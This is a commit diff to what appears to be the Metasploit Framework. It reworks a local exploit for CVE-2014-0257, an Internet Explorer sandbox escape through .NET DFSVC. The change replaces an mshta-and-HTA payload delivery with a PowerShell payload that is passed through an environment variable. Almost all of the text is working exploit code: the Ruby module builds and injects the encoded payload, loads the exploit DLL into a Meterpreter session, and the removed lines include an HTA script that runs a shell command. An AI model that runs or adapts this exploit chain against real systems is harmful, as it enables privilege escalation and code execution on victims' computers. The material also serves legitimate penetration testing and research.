Use powershell instead of mshta

Author: jvazquez-r7

data/exploits/CVE-2014-0257/CVE-2014-0257.dll

@@ -165,8 +165,8 @@ void DoDfsvcExploit()
 				{
 					std::vector<variant_t> startArgs;
 
-					startArgs.push_back(L"mshta");
-					startArgs.push_back(GetEnv(L"MYURL"));
+					startArgs.push_back(L"powershell");
+					startArgs.push_back(GetEnv(L"PSHCMD"));
 
 					ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs);
 				}

external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp

@@ -13,7 +13,6 @@ class Metasploit3 < Msf::Exploit::Local
 
   include Msf::Exploit::Powershell
   include Msf::Exploit::EXE
-  include Msf::Exploit::Remote::HttpServer
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::FileInfo
   include Msf::Post::File
@@ -47,12 +46,15 @@ def initialize(info={})
         ],
       'Platform'	    => [ 'win' ],
       'SessionTypes'	=> [ 'meterpreter' ],
-      'Stance'         => Msf::Exploit::Stance::Aggressive,
       'Targets'	=>
         [
           [ 'IE 8 - 11', { } ]
         ],
       'DefaultTarget' => 0,
+      'DefaultOptions'  =>
+        {
+          'WfsDelay' => 30
+        },
       'DisclosureDate'=> "Feb 11 2014",
       'References' =>
         [
@@ -62,11 +64,6 @@ def initialize(info={})
           ['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
         ]
     ))
-
-    register_options(
-      [
-        OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10])
-      ])
   end
 
   def check
@@ -153,12 +150,20 @@ def exploit
 
     print_good(".NET looks vulnerable, exploiting...")
 
-    begin
-      Timeout.timeout(datastore['DELAY']) { super }
-    rescue Timeout::Error
-    end
+    cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
+    session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
+
+    temp = get_env('TEMP')
 
-    session.railgun.kernel32.SetEnvironmentVariableA("MYURL", nil)
+    print_status("Loading Exploit Library...")
+
+    session.core.load_library(
+        'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
+        'TargetFilePath'  => temp +  "\\CVE-2014-0257.dll",
+        'UploadLibrary'   => true,
+        'Extension'       => false,
+        'SaveToDisk'      => false
+    )
   end
 
   def valid_mscorlib_version?(net_version, mscorlib_version)
@@ -183,37 +188,9 @@ def valid_mscorlib_version?(net_version, mscorlib_version)
     valid
   end
 
-  def primer
-    exploit_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta"
-    session.railgun.kernel32.SetEnvironmentVariableA("MYURL", exploit_uri)
-
-    temp = get_env('TEMP')
-
-    print_status("Loading Exploit Library...")
-
-    session.core.load_library(
-        'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
-        'TargetFilePath'  => temp +  "\\CVE-2014-0257.dll",
-        'UploadLibrary'   => true,
-        'Extension'       => false,
-        'SaveToDisk'      => false
-    )
-  end
-
-  def on_request_uri(cli, request)
-    if request.uri =~ /\.hta$/
-      print_status("Sending hta...")
-      hta = <<-eos
-<script>
-var command = "#{cmd_psh_payload(payload.encoded).strip}";
-var shell = new ActiveXObject("WScript.Shell");
-shell.Run(command);
-</script>
-      eos
-      send_response(cli, hta, {'Content-Type'=>'application/hta'})
-    else
-      send_not_found(cli)
-    end
+  def cleanup
+    session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil)
+    super
   end
 
 end